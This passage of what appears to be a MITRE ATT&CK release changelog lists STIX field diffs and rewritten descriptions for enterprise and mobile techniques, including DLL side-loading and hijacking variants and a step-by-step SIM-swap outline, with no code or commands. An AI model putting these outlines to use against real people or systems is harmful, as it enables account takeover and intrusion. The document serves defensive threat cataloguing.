| external_references[9]['url'] | https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html | https://web.archive.org/web/20201024230407/https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1539] Steal Web Session Cookie
Current version: 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 23:12:39.075000+00:00 |
[T1649] Steal or Forge Authentication Certificates
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 23:12:50.646000+00:00 |
[T1027.003] Obfuscated Files or Information: Steganography
Current version: 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-30 21:01:48.815000+00:00 | 2025-04-15 23:13:05.893000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1565.001] Data Manipulation: Stored Data Manipulation
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-08-26 16:33:33.982000+00:00 | 2025-04-15 23:13:20.667000+00:00 |
| external_references[2]['description'] | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018. | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 17, 2024. |
[T1195] Supply Chain Compromise
Current version: 1.6
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-04 11:17:00.778000+00:00 | 2025-04-15 23:13:41.905000+00:00 |
| external_references[2]['description'] | Command Five Pty Ltd. (2011, September). SK Hack by an Advanced Persistent Threat. Retrieved April 6, 2018. | Command Five Pty Ltd. (2011, September). SK Hack by an Advanced Persistent Threat. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://www.commandfive.com/papers/C5_APT_SKHack.pdf | https://web.archive.org/web/20160309235002/https://www.commandfive.com/papers/C5_APT_SKHack.pdf |
| external_references[4]['description'] | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved November 17, 2024. |
| external_references[4]['url'] | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | https://web.archive.org/web/20190717233006/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf |
[T1216.002] System Script Proxy Execution: SyncAppvPublishingServer
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 19:42:21.547000+00:00 | 2025-04-15 23:13:55.573000+00:00 |
[T1614] System Location Discovery
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:07:23.511000+00:00 | 2025-04-15 23:14:16.731000+00:00 |
[T1007] System Service Discovery
Current version: 1.5
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-03 18:55:18.326000+00:00 | 2025-04-15 23:14:33.837000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1548.006] Abuse Elevation Control Mechanism: TCC Manipulation
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-16 16:54:56.714000+00:00 | 2025-04-15 23:14:58.393000+00:00 |
[T1548.005] Abuse Elevation Control Mechanism: Temporary Elevated Cloud Access
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:07:49.519000+00:00 | 2025-04-15 23:15:17.608000+00:00 |
[T1505.005] Server Software Component: Terminal Services DLL
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 19:40:42.810000+00:00 | 2025-04-15 23:15:45.110000+00:00 |
| x_mitre_detection | Monitor for changes to Registry keys associated with ServiceDll and other subkey values under HKLM\System\CurrentControlSet\services\TermService\Parameters\.
Monitor unexpected changes and/or interactions with termsrv.dll, which is typically stored in %SystemRoot%\System32\.
Monitor commands as well as processes and arguments for potential adversary actions to modify Registry values (ex: reg.exe) or modify/replace the legitimate termsrv.dll.
Monitor module loads by the Terminal Services process (ex: svchost.exe -k termsvcs) for unexpected DLLs (the default is %SystemRoot%\System32\termsrv.dll, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload). | Monitor for changes to Registry keys associated with ServiceDll and other subkey values under HKLM\System\CurrentControlSet\services\TermService\Parameters\.
Monitor unexpected changes and/or interactions with termsrv.dll, which is typically stored in %SystemRoot%\System32\.
Monitor commands as well as processes and arguments for potential adversary actions to modify Registry values (ex: reg.exe) or modify/replace the legitimate termsrv.dll.
Monitor module loads by the Terminal Services process (ex: svchost.exe -k termsvcs) for unexpected DLLs (the default is %SystemRoot%\System32\termsrv.dll, though an adversary could also use [Match Legitimate Resource Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload). |
[T1597.001] Search Closed Sources: Threat Intel Vendors
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-15 03:45:30.862000+00:00 | 2025-04-15 23:16:02.261000+00:00 |
[T1588.002] Obtain Capabilities: Tool
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-16 16:20:16.431000+00:00 | 2025-04-15 23:16:21.007000+00:00 |
[T1537] Transfer Data to Cloud Account
Current version: 1.5
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:08:25.344000+00:00 | 2025-04-15 23:16:36.472000+00:00 |
| external_references[6]['description'] | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018. | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved November 17, 2024. |
| external_references[6]['url'] | https://www.justice.gov/file/1080281/download | https://cdn.cnn.com/cnn/2018/images/07/13/gru.indictment.pdf |
[T1565.002] Data Manipulation: Transmitted Data Manipulation
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-08-26 16:33:33.983000+00:00 | 2025-04-15 23:16:50.965000+00:00 |
| external_references[2]['description'] | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018. | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 17, 2024. |
[T1199] Trusted Relationship
Current version: 2.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:08:39.968000+00:00 | 2025-04-15 23:17:12.008000+00:00 |
[T1546.017] Event Triggered Execution: Udev Rules
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-11-11 19:05:38.708000+00:00 | 2025-04-15 23:17:25.978000+00:00 |
[T1535] Unused/Unsupported Cloud Regions
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-12-14 16:28:24.680000+00:00 | 2025-04-15 23:17:42.649000+00:00 |
[T1608.001] Stage Capabilities: Upload Malware
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-16 20:13:40.501000+00:00 | 2025-04-15 23:17:57.194000+00:00 |
[T1608.002] Stage Capabilities: Upload Tool
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-20 20:16:32.599000+00:00 | 2025-04-15 23:18:15.337000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1583.003] Acquire Infrastructure: Virtual Private Server
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 13:22:11.113000+00:00 | 2025-04-15 23:18:46.651000+00:00 |
| external_references[3]['description'] | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021. | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved November 17, 2024. |
| external_references[3]['url'] | https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation | https://cloud.google.com/blog/topics/threat-intelligence/scandalous-external-detection-using-network-scan-data-and-automation/ |
[T1584.003] Compromise Infrastructure: Virtual Private Server
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-17 15:59:02.770000+00:00 | 2025-04-15 23:19:04.087000+00:00 |
| external_references[3]['description'] | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021. | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved November 17, 2024. |
| external_references[3]['url'] | https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation | https://cloud.google.com/blog/topics/threat-intelligence/scandalous-external-detection-using-network-scan-data-and-automation/ |
[T1588.006] Obtain Capabilities: Vulnerabilities
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-15 03:16:32.119000+00:00 | 2025-04-15 23:19:21.267000+00:00 |
[T1595.002] Active Scanning: Vulnerability Scanning
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 13:37:31.317000+00:00 | 2025-04-15 23:19:33.981000+00:00 |
[T1596.002] Search Open Technical Databases: WHOIS
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-15 03:50:44.113000+00:00 | 2025-04-15 23:20:02.082000+00:00 |
| external_references[1]['description'] | NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020. | NTT America. (n.d.). Whois Lookup. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www.whois.net/ | https://who.is/ |
[T1606.001] Forge Web Credentials: Web Cookies
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 21:25:10.511000+00:00 | 2025-04-15 23:20:22.744000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1584.006] Compromise Infrastructure: Web Services
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:44:09.114000+00:00 | 2025-04-15 23:20:42.131000+00:00 |
[T1016.002] System Network Configuration Discovery: Wi-Fi Discovery
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-05 11:35:30.887000+00:00 | 2025-04-15 23:21:00.705000+00:00 |
[T1555.004] Credentials from Password Stores: Windows Credential Manager
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:44:35.906000+00:00 | 2025-04-15 23:21:30.628000+00:00 |
[T1222.001] File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-21 12:27:04.900000+00:00 | 2025-04-15 23:21:45.352000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1021.006] Remote Services: Windows Remote Management
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 15:28:23.398000+00:00 | 2025-04-15 23:22:03.699000+00:00 |
[T1595.003] Active Scanning: Wordlist Scanning
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-15 19:10:23.838000+00:00 | 2025-04-15 23:22:19.165000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Revocations
[T1574.002] Hijack Execution Flow: DLL Side-Loading
Current version: 2.1
Description:
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL, side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)
This object has been revoked by [T1574.001] DLL
Description for [T1574.001] DLL: Adversaries may abuse dynamic-link library files (DLLs) in order to achieve persistence, escalate privileges, and evade defenses. DLLs are libraries that contain code and data that can be simultaneously utilized by multiple programs. While DLLs are not malicious by nature, they can be abused through mechanisms such as side-loading, hijacking search order, and phantom DLL hijacking.(Citation: unit 42)
Specific ways DLLs are abused by adversaries include:
### DLL Sideloading
Adversaries may execute their own malicious payloads by side-loading DLLs. Side-loading involves hijacking which DLL a program loads by planting and then invoking a legitimate application that executes their payload(s).
Side-loading positions both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.
Adversaries may also side-load other packages, such as BPLs (Borland Package Library).(Citation: kroll bpl)
### DLL Search Order Hijacking
Adversaries may execute their own malicious payloads by hijacking the search order that Windows uses to load DLLs. This search order is a sequence of special and standard search locations that a program checks when loading a DLL. An adversary can plant a trojan DLL in a directory that will be prioritized by the DLL search order over the location of a legitimate library. This will cause Windows to load the malicious DLL when it is called for by the victim program.(Citation: unit 42)
### DLL Redirection
Adversaries may directly modify the search order via DLL redirection, which after being enabled (in the Registry or via the creation of a redirection file) may cause a program to load a DLL from a different location.(Citation: Microsoft redirection)(Citation: Microsoft - manifests/assembly)
### Phantom DLL Hijacking
Adversaries may leverage phantom DLL hijacking by targeting references to non-existent DLL files. They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.(Citation: Hexacorn DLL Hijacking)(Citation: Hijack DLLs CrowdStrike)
### DLL Substitution
Adversaries may target existing, valid DLL files and substitute them with their own malicious DLLs, planting them with the same name and in the same location as the valid DLL file.(Citation: Wietze Beukema DLL Hijacking)
Programs that fall victim to DLL hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace, evading defenses.
Remote DLL hijacking can occur when a program sets its current directory to a remote location, such as a Web share, before loading a DLL.(Citation: dll pre load owasp)(Citation: microsoft remote preloading)
If a valid DLL is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation.
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_data_sources | ['File: File Modification', 'Process: Process Creation', 'Module: Module Load', 'File: File Creation'] | |
| x_mitre_defense_bypassed | ['Anti-virus', 'Application Control'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-30 21:01:47.241000+00:00 | 2025-04-15 19:59:17.126000+00:00 |
| description | Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading) | Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading) |
| revoked | False | True |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 2.0 | 2.1 |
mobile-attack
New Techniques
[T1670] Virtualization Solution
Current version: 1.0
Description:
Adversaries may carry out malicious operations using virtualization solutions to escape from Android sandboxes and to avoid detection. Android uses sandboxes to separate resources and code execution between applications and the operating system.(Citation: Android Application Sandbox) There are a few virtualization solutions available on Android, such as the Android Virtualization Framework (AVF).(Citation: Android AVF Overview)
Through virtualization solutions, adversaries may execute malicious operations without user knowledge. For example, adversaries may mimic a legitimate banking application’s functionalities in a virtual environment, thanks to the virtualization solution, while malicious code captures credentials.
Major Version Changes
[T1451] SIM Card Swap
Current version: 2.0
Version changed from: 1.2 → 2.0
|
|
|---|
| t | An adversary could convince the mobile network operator (e.g | t | Adversaries may gain access to mobile devices through transf |
| . through social networking, forged identification, or insid | | ers or swaps from victims’ phone numbers to adversary-contro |
| er attacks performed by trusted employees) to issue a new SI | | lled SIM cards and mobile devices.(Citation: ATT SIM Swap Sc |
| M card and associate it with an existing phone number and ac | | ams)(Citation: Verizon SIM Swapping) The typical process i |
| count.(Citation: NYGov-Simswap)(Citation: Motherboard-Simswa | | s as follows: 1. Adversaries will first gather informatio |
| p2) The adversary could then obtain SMS messages or hijack p | | n about victims through [Phishing](https://attack.mitre.org/ |
| hone calls intended for someone else.(Citation: Betanews-Sim | | techniques/T1660), social engineering, data breaches, or oth |
| swap) One use case is intercepting authentication messages | | er avenues. 2. Adversaries will then impersonate victims as |
| or phone calls to obtain illicit access to online banking or | | they contact mobile carriers to request for the SIM swaps. |
| other online accounts, as many online services allow accoun | | For example, adversaries would provide victims’ name and add |
| t password resets by sending an authentication code over SMS | | ress to mobile carriers; once authenticated, adversaries wou |
| to a phone number associated with the account.(Citation: Gu | | ld request for victims’ phone numbers to be transferred to a |
| ardian-Simswap)(Citation: Motherboard-Simswap1)(Citation: Kr | | dversary-controlled SIM cards. 3. Once completed, victims |
| ebs-SimSwap)(Citation: TechCrunch-SimSwap) | | will lose mobile data, such as text messages and phone calls |
| | | , on their mobile devices. In turn, adversaries will receive |
| | | mobile data that was intended for the victims. Adversari |
| | | es may use the intercepted SMS messages to log into online a |
| | | ccounts that use SMS-based authentication. Specifically, adv |
| | | ersaries may use SMS-based authentication to log into bankin |
| | | g and/or cryptocurrency accounts, then transfer funds to adv |
| | | ersary-controlled wallets. |
New Mitigations:
- M1011: User Guidance
- M1012: Enterprise Policy
New Detections:
- DS0042: User Interface (System Notifications)
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-06 15:53:54.872000+00:00 | 2025-02-12 16:26:38.632000+00:00 |
| description | An adversary could convince the mobile network operator (e.g. through social networking, forged identification, or insider attacks performed by trusted employees) to issue a new SIM card and associate it with an existing phone number and account.(Citation: NYGov-Simswap)(Citation: Motherboard-Simswap2) The adversary could then obtain SMS messages or hijack phone calls intended for someone else.(Citation: Betanews-Simswap)
One use case is intercepting authentication messages or phone calls to obtain illicit access to online banking or other online accounts, as many online services allow account password resets by sending an authentication code over SMS to a phone number associated with the account.(Citation: Guardian-Simswap)(Citation: Motherboard-Simswap1)(Citation: Krebs-SimSwap)(Citation: TechCrunch-SimSwap) | Adversaries may gain access to mobile devices through transfers or swaps from victims’ phone numbers to adversary-controlled SIM cards and mobile devices.(Citation: ATT SIM Swap Scams)(Citation: Verizon SIM Swapping)
The typical process is as follows:
1. Adversaries will first gather information about victims through [Phishing](https://attack.mitre.org/techniques/T1660), social engineering, data breaches, or other avenues.
2. Adversaries will then impersonate victims as they contact mobile carriers to request for the SIM swaps. For example, adversaries would provide victims’ name and address to mobile carriers; once authenticated, adversaries would request for victims’ phone numbers to be transferred to adversary-controlled SIM cards.
3. Once completed, victims will lose mobile data, such as text messages and phone calls, on their mobile devices. In turn, adversaries will receive mobile data that was intended for the victims.
Adversaries may use the intercepted SMS messages to log into online accounts that use SMS-based authentication. Specifically, adversaries may use SMS-based authentication to log into banking and/or cryptocurrency accounts, then transfer funds to adversary-controlled wallets. |
| kill_chain_phases[0]['phase_name'] | network-effects | initial-access |
| external_references[1]['source_name'] | Betanews-Simswap | Verizon SIM Swapping |
| external_references[1]['description'] | Alex Cambell. (2016, February 12). Everything you need to know about SIM swap scams. Retrieved December 12, 2016. | Verizon. (n.d.). SIM Swapping. Retrieved January 27, 2025. |
| external_references[1]['url'] | http://betanews.com/2016/02/12/everything-you-need-to-know-about-sim-swap-scams/ | https://www.verizon.com/about/account-security/sim-swapping |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_deprecated | True | False |
| x_mitre_version | 1.2 | 2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'ATT SIM Swap Scams', 'description': 'AT&T. (n.d.). UPDATE: Secure Your Number to Reduce SIM Swap Scams. Retrieved January 27, 2025.', 'url': 'https://www.research.att.com/sites/cyberaware/ni/blog/sim_swap.html'} |
| x_mitre_contributors | | Jennifer Kim Roman |
iterable_item_removed| STIX Field | Old value | New Value |
|---|
| external_references | {'source_name': 'Krebs-SimSwap', 'description': 'Brian Krebs. (2018, May 18). T-Mobile Employee Made Unauthorized ‘SIM Swap’ to Steal Instagram Account. Retrieved November 8, 2018.', 'url': 'https://krebsonsecurity.com/2018/05/t-mobile-employee-made-unauthorized-sim-swap-to-steal-instagram-account/'} | |
| external_references | {'source_name': 'TechCrunch-SimSwap', 'description': 'John Biggs. (2017, August 23). I was hacked. Retrieved November 8, 2018.', 'url': 'https://techcrunch.com/2017/08/23/i-was-hacked/'} | |
| external_references | {'source_name': 'Motherboard-Simswap2', 'description': 'Lorenzo Franceschi-Bicchierai. (2018, August 3). How Criminals Recruit Telecom Employees to Help Them Hijack SIM Cards. Retrieved August 11, 2018.', 'url': 'https://motherboard.vice.com/en_us/article/3ky5a5/criminals-recruit-telecom-employees-sim-swapping-port-out-scam'} | |
| external_references | {'source_name': 'Motherboard-Simswap1', 'description': 'Lorenzo Franceschi-Bicchierai. (2018, July 17). The SIM Hijackers. Retrieved August 11, 2018.', 'url': 'https://motherboard.vice.com/en_us/article/vbqax3/hackers-sim-swapping-steal-phone-numbers-instagram-bitcoin'} | |
| external_references | {'source_name': 'Guardian-Simswap', 'description': 'Miles Brignall. (2016, April 16). Sim-swap fraud claims another mobile banking victim. Retrieved December 12, 2016.', 'url': 'https://www.theguardian.com/money/2016/apr/16/sim-swap-fraud-mobile-banking-fraudsters'} | |
| external_references | {'source_name': 'NYGov-Simswap', 'description': 'New York Department of State. (2016, February 12). AT&T SIM-Card Switch Scam. Retrieved August 23, 2016.', 'url': 'http://www.dos.ny.gov/consumerprotection/scams/att-sim.html'} | |
Minor Version Changes
[T1664] Exploitation for Initial Access
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Adversaries may exploit software vulnerabilities to gain ini | t | Adversaries may exploit software vulnerabilities to gain ini |
| tial access to a mobile device. This can be accomplished i | | tial access to a mobile device. This can be accomplished i |
| n a variety of ways. Vulnerabilities may be present in appli | | n a variety of ways. Vulnerabilities may be present in the a |
| cations, services, the underlying operating system, or in th | | pplications, the services, the underlying operating system, |
| e kernel itself. Several well-known mobile device exploits e | | or the kernel itself. Several well-known mobile device explo |
| xist, including FORCEDENTRY, StageFright, and BlueBorne. Fur | | its exist, including FORCEDENTRY, StageFright, and BlueBorne |
| ther, some exploits may be possible to exploit without any u | | . Furthermore, some exploits may be possible to exploit with |
| ser interaction (zero-click), making them particularly dange | | out any user interaction (i.e. zero-click exploits, see [Exp |
| rous. Mobile operating system vendors are typically very qui | | loitation for Client Execution](https://attack.mitre.org/tec |
| ck to patch such critical bugs, ensuring only a small window | | hniques/T1658)), making them particularly dangerous. Mobile |
| where they can be exploited. | | operating system vendors are typically very quick to patch s |
| | | uch critical bugs, ensuring only a small window where they c |
| | | an be exploited. |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-12-05 22:14:54.813000+00:00 | 2025-02-27 22:56:19.681000+00:00 |
| description | Adversaries may exploit software vulnerabilities to gain initial access to a mobile device.
This can be accomplished in a variety of ways. Vulnerabilities may be present in applications, services, the underlying operating system, or in the kernel itself. Several well-known mobile device exploits exist, including FORCEDENTRY, StageFright, and BlueBorne. Further, some exploits may be possible to exploit without any user interaction (zero-click), making them particularly dangerous. Mobile operating system vendors are typically very quick to patch such critical bugs, ensuring only a small window where they can be exploited. | Adversaries may exploit software vulnerabilities to gain initial access to a mobile device.
This can be accomplished in a variety of ways. Vulnerabilities may be present in the applications, the services, the underlying operating system, or the kernel itself. Several well-known mobile device exploits exist, including FORCEDENTRY, StageFright, and BlueBorne. Furthermore, some exploits may be possible to exploit without any user interaction (i.e. zero-click exploits, see [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1658)), making them particularly dangerous. Mobile operating system vendors are typically very quick to patch such critical bugs, ensuring only a small window where they can be exploited. |
| x_mitre_version | 1.0 | 1.1 |
Patches
[T1626] Abuse Elevation Control Mechanism
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-15 16:23:59.281000+00:00 | 2025-04-16 21:21:43.814000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1517] Access Notifications
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-15 16:26:05.050000+00:00 | 2025-04-16 21:21:48.448000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1640] Account Access Removal
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-15 16:34:51.917000+00:00 | 2025-04-16 21:21:57.695000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1437] Application Layer Protocol
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-19 20:03:51.831000+00:00 | 2025-04-16 21:21:50.479000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1532] Archive Collected Data
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-01 15:01:02.140000+00:00 | 2025-04-16 21:21:57.990000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1521.002] Encrypted Channel: Asymmetric Cryptography
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-05 20:16:21.324000+00:00 | 2025-04-16 21:21:44.987000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1429] Audio Capture
Current version: 3.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-16 13:31:29.924000+00:00 | 2025-04-16 21:21:49.937000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1481.002] Web Service: Bidirectional Communication
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-14 16:34:55.968000+00:00 | 2025-04-16 21:21:51.825000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1398] Boot or Logon Initialization Scripts
Current version: 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-16 18:26:46.043000+00:00 | 2025-04-16 21:21:48.836000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1624.001] Event Triggered Execution: Broadcast Receivers
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-16 18:27:42.752000+00:00 | 2025-04-16 21:21:48.286000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1636.001] Protected User Data: Calendar Entries
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-16 18:28:28.234000+00:00 | 2025-04-16 21:21:53.420000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1616] Call Control
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-10 21:57:52.009000+00:00 | 2025-04-16 21:21:47.962000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1636.002] Protected User Data: Call Log
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-16 18:32:30.150000+00:00 | 2025-04-16 21:21:45.503000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1632.001] Subvert Trust Controls: Code Signing Policy Modification
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-16 18:37:55.822000+00:00 | 2025-04-16 21:21:59.231000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1623] Command and Scripting Interpreter
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
